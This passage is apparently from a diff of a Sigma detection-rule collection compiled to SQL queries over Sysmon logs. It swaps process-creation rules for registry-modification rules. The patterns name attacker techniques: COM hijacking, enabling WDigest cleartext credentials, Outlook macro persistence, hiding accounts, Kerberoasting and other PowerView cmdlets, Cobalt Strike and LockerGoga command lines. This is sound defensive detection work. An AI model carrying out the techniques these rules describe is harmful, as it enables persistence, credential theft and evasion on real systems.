LIKE '%;iex(%' ESCAPE '\\' OR CommandLine LIKE '%MiniDump%' ESCAPE '\\' OR CommandLine LIKE '%net user %' ESCAPE '\\'))) AND NOT ((CommandLine = 'ping 127.0.0.1 -n 5') OR (Image LIKE '%\\\\PING.EXE' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\DismFoDInstall.cmd%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Program Files (x86)\\\\Java\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\bin\\\\javaws.exe' ESCAPE '\\' AND Image LIKE 'C:\\\\Program Files (x86)\\\\Java\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\bin\\\\jp2launcher.exe' ESCAPE '\\' AND CommandLine LIKE '% -ma %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE 'HKCR\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_CLASSES\\_ROOT\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKCU\\\\Software\\\\Classes\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_CURRENT\\_USER\\\\Software\\\\Classes\\\\CLSID\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\InprocServer32\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%\\\\LocalServer32\\\\(Default)' ESCAPE '\\') AND (Details LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\System32\\\\spool\\\\drivers\\\\color\\\\%' ESCAPE '\\' OR Details LIKE '%\\%temp\\%%' ESCAPE '\\' OR Details LIKE '%\\%tmp\\%%' ESCAPE '\\' OR Details LIKE '%\\%appdata\\%%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_system_user_anomaly.yml" + "filename": "registry_set_persistence_com_hijacking_susp_locations.yml" }, { - "title": "LockerGoga Ransomware Activity", - "id": "74db3488-fd28-480a-95aa-b7af626de068", - "status": "stable", - "description": "Detects LockerGoga ransomware activity via specific command line.", - "author": "Vasiliy Burov, oscd.community", + "title": "Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting", + "id": "396ae3eb-4174-4b9b-880e-dc0364d78a19", + "status": "experimental", + "description": "Detects the modification of Outlook setting \"LoadMacroProviderOnBoot\" which if enabled allows the automatic loading of any configured VBA project/module", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1486" + "attack.persistence", + "attack.command_and_control", + "attack.t1137", + "attack.t1008", + "attack.t1546" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-i SM-tgytutrc -s%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\LoadMacroProviderOnBoot' ESCAPE '\\' AND Details LIKE '%0x00000001%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_lockergoga_ransomware.yml" + "filename": "registry_set_office_outlook_enable_load_macro_provider_on_boot.yml" }, { - "title": "Xwizard DLL Sideloading", - "id": "193d5ccd-6f59-40c6-b5b0-8e32d5ddd3d1", + "title": "Hiding User Account Via SpecialAccounts Registry Key", + "id": "f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd", "status": "test", - "description": "Detects the execution of Xwizard tool from the non-default directory which can be used to sideload a custom xwizards.dll", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects modifications to the registry key \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\" where the value is set to \"0\" in order to hide user account from being listed on the logon screen.", + "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.t1564.002" ], "falsepositives": [ - "Windows installed on non-C drive" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\xwizard.exe' ESCAPE '\\' AND NOT (Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\SpecialAccounts\\\\UserList%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_lolbin_dll_sideload_xwizard.yml" + "filename": "registry_set_special_accounts.yml" }, { - "title": "Potential Privilege Escalation Using Symlink Between Osk and Cmd", - "id": "e9b61244-893f-427c-b287-3e708f321c6b", + "title": "Suspicious Application Allowed Through Exploit Guard", + "id": "42205c73-75c8-4a63-9db1-e3782e06fda0", "status": "experimental", - "description": "Detects the creation of a symbolic link between \"cmd.exe\" and the accessibility on-screen keyboard binary (osk.exe) using \"mklink\". This technique provides an elevated command prompt to the user from the login screen without the need to log in.", - "author": "frack113", + "description": "Detects applications being added to the \"allowed applications\" list of exploit guard in order to bypass controlled folder settings", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1546.008" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%mklink%' ESCAPE '\\' AND CommandLine LIKE '%\\\\osk.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\cmd.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\AllowedApplications%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_mklink_osk_cmd.yml" + "filename": "registry_set_exploit_guard_susp_allowed_apps.yml" }, { - "title": "CreateDump Process Dump", - "id": "515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48", - "status": "experimental", - "description": "Detects uses of the createdump.exe LOLOBIN utility to dump process memory", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "PowerShell as a Service in Registry", + "id": "4a5f5a5e-ac01-474b-9b4e-d61298c9df1d", + "status": "test", + "description": "Detects that a powershell code is written to the registry as a service.", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Command lines that use the same flags" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\createdump.exe' ESCAPE '\\' OR OriginalFileName LIKE 'FX\\_VER\\_INTERNALNAME\\_STR' ESCAPE '\\') AND (CommandLine LIKE '% -u %' ESCAPE '\\' OR CommandLine LIKE '% --full %' ESCAPE '\\' OR CommandLine LIKE '% -f %' ESCAPE '\\' OR CommandLine LIKE '% --name %' ESCAPE '\\' OR CommandLine LIKE '%.dmp %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImagePath' ESCAPE '\\' AND (Details LIKE '%powershell%' ESCAPE '\\' OR Details LIKE '%pwsh%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_createdump.yml" + "filename": "registry_set_powershell_as_service.yml" }, { - "title": "Kavremover Dropped Binary LOLBIN Usage", - "id": "d047726b-c71c-4048-a99b-2e2f50dc107d", - "status": "experimental", - "description": "Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Outlook Macro Execution Without Warning Setting Enabled", + "id": "e3b50fa5-3c3f-444e-937b-0a99d33731cd", + "status": "test", + "description": "Detects the modification of Outlook security setting to allow unprompted execution of macros.", + "author": "@ScoubiMtl", + "tags": [ + "attack.persistence", + "attack.command_and_control", + "attack.t1137", + "attack.t1008", + "attack.t1546" + ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", - "tags": [ - "attack.defense_evasion", - "attack.t1127" - ], "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '% run run-cmd %' ESCAPE '\\' AND NOT ((ParentImage LIKE '%\\\\kavremover.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cleanapi.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\Security\\\\Level' ESCAPE '\\' AND Details LIKE '%0x00000001%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_kavremover.yml" + "filename": "registry_set_office_outlook_enable_macro_execution.yml" }, { - "title": "PUA - Wsudo Suspicious Execution", - "id": "bdeeabc9-ff2a-4a51-be59-bb253aac7891", + "title": "Outlook EnableUnsafeClientMailRules Setting Enabled - Registry", + "id": "6763c6c8-bd01-4687-bc8d-4fa52cf8ba08", "status": "experimental", - "description": "Detects usage of wsudo (Windows Sudo Utility). Which is a tool that let the user execute programs with different permissions (System, Trusted Installer, Administrator...etc)", + "description": "Detects an attacker trying to enable the outlook security setting \"EnableUnsafeClientMailRules\" which allows outlook to run applications or execute macros", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.t1059" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wsudo.exe' ESCAPE '\\' OR OriginalFileName = 'wsudo.exe' OR Description = 'Windows sudo utility' OR ParentImage LIKE '%\\\\wsudo-bridge.exe' ESCAPE '\\' OR (CommandLine LIKE '%-u System%' ESCAPE '\\' OR CommandLine LIKE '%-uSystem%' ESCAPE '\\' OR CommandLine LIKE '%-u TrustedInstaller%' ESCAPE '\\' OR CommandLine LIKE '%-uTrustedInstaller%' ESCAPE '\\' OR CommandLine LIKE '% --ti %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\Security\\\\EnableUnsafeClientMailRules' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_pua_wsudo_susp_execution.yml" + "filename": "registry_set_office_outlook_enable_unsafe_client_mail_rules.yml" }, { - "title": "HackTool - SharpView Execution", - "id": "b2317cfa-4a47-4ead-b3ff-297438c0bc2d", + "title": "CVE-2021-31979 CVE-2021-33771 Exploits", + "id": "32b5db62-cb5f-4266-9639-0fa48376ac00", "status": "experimental", - "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems", - "author": "frack113", + "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum", + "author": "Sittikorn S, frack113", "tags": [ - "attack.discovery", - "attack.t1049", - "attack.t1069.002", - "attack.t1482", - "attack.t1135", - "attack.t1033" + "attack.credential_access", + "attack.t1566", + "attack.t1203", + "cve.2021.33771", + "cve.2021.31979" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'SharpView.exe' OR Image LIKE '%\\\\SharpView.exe' ESCAPE '\\' OR (CommandLine LIKE '%Add-RemoteConnection%' ESCAPE '\\' OR CommandLine LIKE '%Convert-ADName%' ESCAPE '\\' OR CommandLine LIKE '%ConvertFrom-SID%' ESCAPE '\\' OR CommandLine LIKE '%ConvertFrom-UACValue%' ESCAPE '\\' OR CommandLine LIKE '%Convert-SidToName%' ESCAPE '\\' OR CommandLine LIKE '%Export-PowerViewCSV%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainObjectPropertyOutlier%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainProcess%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainShare%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainUserEvent%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainUserLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-ForeignGroup%' ESCAPE '\\' OR CommandLine LIKE '%Find-ForeignUser%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOComputerAdmin%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-Interesting%' ESCAPE '\\' OR CommandLine LIKE '%Find-LocalAdminAccess%' ESCAPE '\\' OR CommandLine LIKE '%Find-ManagedSecurityGroups%' ESCAPE '\\' OR CommandLine LIKE '%Get-CachedRDPConnection%' ESCAPE '\\' OR CommandLine LIKE '%Get-DFSshare%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainComputer%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainController%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainDFSShare%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainDNSRecord%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainFileServer%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainForeign%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGPO%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGUIDMap%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainManagedSecurityGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainObject%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainOU%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainPolicy%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSID%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSite%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSPNTicket%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSubnet%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainTrust%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainUserEvent%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestDomain%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestGlobalCatalog%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestTrust%' ESCAPE '\\' OR CommandLine LIKE '%Get-GptTmpl%' ESCAPE '\\' OR CommandLine LIKE '%Get-GroupsXML%' ESCAPE '\\' OR CommandLine LIKE '%Get-LastLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-LoggedOnLocal%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetComputer%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetDomain%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetFileServer%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetForest%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetGPO%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetGroupMember%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetLocalGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetLoggedon%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetOU%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetProcess%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetRDPSession%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSession%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetShare%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSite%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSubnet%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetUser%' ESCAPE '\\' OR CommandLine LIKE '%Get-PathAcl%' ESCAPE '\\' OR CommandLine LIKE '%Get-PrincipalContext%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegistryMountedDrive%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegCachedRDPConnection%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegLastLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegMountedDrive%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegProxy%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CheckLocalAdminAccess%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MapDomainTrust%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-RevertToSelf%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Sharefinder%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UserImpersonation%' ESCAPE '\\' OR CommandLine LIKE '%Remove-DomainObjectAcl%' ESCAPE '\\' OR CommandLine LIKE '%Remove-RemoteConnection%' ESCAPE '\\' OR CommandLine LIKE '%Request-SPNTicket%' ESCAPE '\\' OR CommandLine LIKE '%Set-DomainObject%' ESCAPE '\\' OR CommandLine LIKE '%Test-AdminAccess%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%CLSID\\\\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\\\\InprocServer32\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%CLSID\\\\{7C857801-7381-11CF-884D-00AA004B2E24}\\\\InProcServer32\\\\(Default)' ESCAPE '\\')) AND NOT ((Details LIKE '%system32\\\\wbem\\\\wmiutils.dll' ESCAPE '\\' OR Details LIKE '%system32\\\\wbem\\\\wbemsvc.dll' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_sharpview.yml" + "filename": "registry_set_cve_2021_31979_cve_2021_33771_exploits.yml" }, { - "title": "UEFI Persistence Via Wpbbin - ProcessCreation", - "id": "4abc0ec4-db5a-412f-9632-26659cddf145", - "status": "experimental", - "description": "Detects execution of the binary \"wpbbin\" which is used as part of the UEFI based persistence method described in the reference section", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "DHCP Callout DLL Installation", + "id": "9d3436ef-9476-4c43-acca-90ce06bdf33a", + "status": "test", + "description": "Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required)", + "author": "Dimitrios Slamaris", "tags": [ - "attack.persistence", "attack.defense_evasion", - "attack.t1542.001" + "attack.t1574.002", + "attack.t1112" ], "falsepositives": [ - "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\Windows\\\\System32\\\\wpbbin.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Services\\\\DHCPServer\\\\Parameters\\\\CalloutDlls' ESCAPE '\\' OR TargetObject LIKE '%\\\\Services\\\\DHCPServer\\\\Parameters\\\\CalloutEnabled' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wpbbin_potential_persistence.yml" + "filename": "registry_set_dhcp_calloutdll.yml" }, { - "title": "Suspicious PowerShell Command Line", - "id": "d7bcd677-645d-4691-a8d4-7a5602b780d1", - "status": "test", - "description": "Detects the PowerShell command lines with special characters", - "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp)", + "title": "Potential EventLog File Location Tampering", + "id": "0cb8d736-995d-4ce7-a31e-1e8d452a1459", + "status": "experimental", + "description": "Detects tampering with EventLog service \"file\" key. In order to change the default location of an Evtx file. This technique is used to tamper with log collection and alerting", + "author": "D3F7A5105", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1562.002" ], "falsepositives": [ - "Unlikely", - "Amazon SSM Document Worker", - "Windows Defender ATP" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*') OR ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*') OR ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*\\{.*\\{.*\\{.*\\{.*\\{.*') OR ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*\\^.*\\^.*\\^.*\\^.*\\^.*') OR ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*`.*`.*`.*`.*`.*')) AND NOT (ParentImage LIKE 'C:\\\\Program Files\\\\Amazon\\\\SSM\\\\ssm-document-worker.exe' ESCAPE '\\')) AND NOT (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*\\{.*\\{.*\\{.*\\{.*\\{.*' AND (CommandLine LIKE '%new EventSource(\"Microsoft.Windows.Sense.Client.Management\"%' ESCAPE '\\' OR CommandLine LIKE '%public static extern bool InstallELAMCertificateInfo(SafeFileHandle handle);%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\EventLog\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\File' ESCAPE '\\') AND NOT (Details LIKE '%\\\\System32\\\\Winevt\\\\Logs\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_cmdline_special_characters.yml" + "filename": "registry_set_evtx_file_key_tamper.yml" }, { - "title": "Potential Persistence Via Powershell Search Order Hijacking - Task", - "id": "b66474aa-bd92-4333-a16c-298155b120df", - "status": "experimental", - "description": "Detects suspicious powershell execution via a schedule task where the command ends with an suspicious flags to hide the powershell instance instead of executeing scripts or commands. This could be a sign of persistence via PowerShell \"Get-Variable\" technique as seen being used in Colibri Loader", - "author": "pH-T (Nextron Systems), Florian Roth (Nextron Systems)", + "title": "Wdigest Enable UseLogonCredential", + "id": "d6a9b252-c666-4de6-8806-5561bbbd3bdc", + "status": "test", + "description": "Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to enable clear-text credentials", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1053.005", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE 'C:\\\\WINDOWS\\\\System32\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k netsvcs%' ESCAPE '\\' AND ParentCommandLine LIKE '%-s Schedule%' ESCAPE '\\' AND (CommandLine LIKE '% -windowstyle hidden' ESCAPE '\\' OR CommandLine LIKE '% -w hidden' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass' ESCAPE '\\' OR CommandLine LIKE '% -noni' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%WDigest\\\\UseLogonCredential' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_schtasks_powershell_persistence.yml" + "filename": "registry_set_wdigest_enable_uselogoncredential.yml" }, { - "title": "Suspicious Kernel Dump Using Dtrace", - "id": "7124aebe-4cd7-4ccb-8df0-6d6b93c96795", + "title": "Suspicious New Printer Ports in Registry (CVE-2020-1048)", + "id": "7ec912f2-5175-4868-b811-ec13ad0f8567", "status": "test", - "description": "Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, which is available on Windows systems since Windows 10 19H1", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a new and suspicious printer port creation in Registry that could be an attempt to exploit CVE-2020-1048", + "author": "EagleEye Team, Florian Roth (Nextron Systems), NVISO", + "tags": [ + "attack.persistence", + "attack.execution", + "attack.defense_evasion", + "attack.t1112" + ], "falsepositives": [ - "Unknown" + "New printer port install on host" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\dtrace.exe' ESCAPE '\\' AND CommandLine LIKE '%lkd(0)%' ESCAPE '\\') OR (CommandLine LIKE '%syscall:::return%' ESCAPE '\\' AND CommandLine LIKE '%lkd(%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Ports%' ESCAPE '\\' AND (Details LIKE '%.dll%' ESCAPE '\\' OR Details LIKE '%.exe%' ESCAPE '\\' OR Details LIKE '%.bat%' ESCAPE '\\' OR Details LIKE '%.com%' ESCAPE '\\' OR Details LIKE '%C:%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_dtrace_kernel_dump.yml" + "filename": "registry_set_cve_2020_1048_new_printer_port.yml" }, { - "title": "CobaltStrike Process Patterns", - "id": "f35c5d71-b489-4e22-a115-f003df287317", + "title": "UAC Bypass via Event Viewer - Registry Set", + "id": "7c81fec3-1c1d-43b0-996a-46753041b1b6", "status": "experimental", - "description": "Detects process patterns found in Cobalt Strike beacon activity (see reference for more details) and also cases in which a China Chopper like webshell is used to run whoami", + "description": "Detects UAC bypass method using Windows event viewer", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "car.2019-04-001" ], "falsepositives": [ - "Other programs that cause these patterns (please report)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((CommandLine LIKE '%\\\\cmd.exe /C whoami%' ESCAPE '\\' AND ParentImage LIKE 'C:\\\\Temp%' ESCAPE '\\') OR ((CommandLine LIKE '%cmd.exe /c echo%' ESCAPE '\\' OR CommandLine LIKE '%> \\\\\\\\.\\\\pipe%' ESCAPE '\\' OR CommandLine LIKE '%\\\\whoami.exe%' ESCAPE '\\') AND ParentImage LIKE '%\\\\dllhost.exe' ESCAPE '\\') OR (Image LIKE '%\\\\cmd.exe' 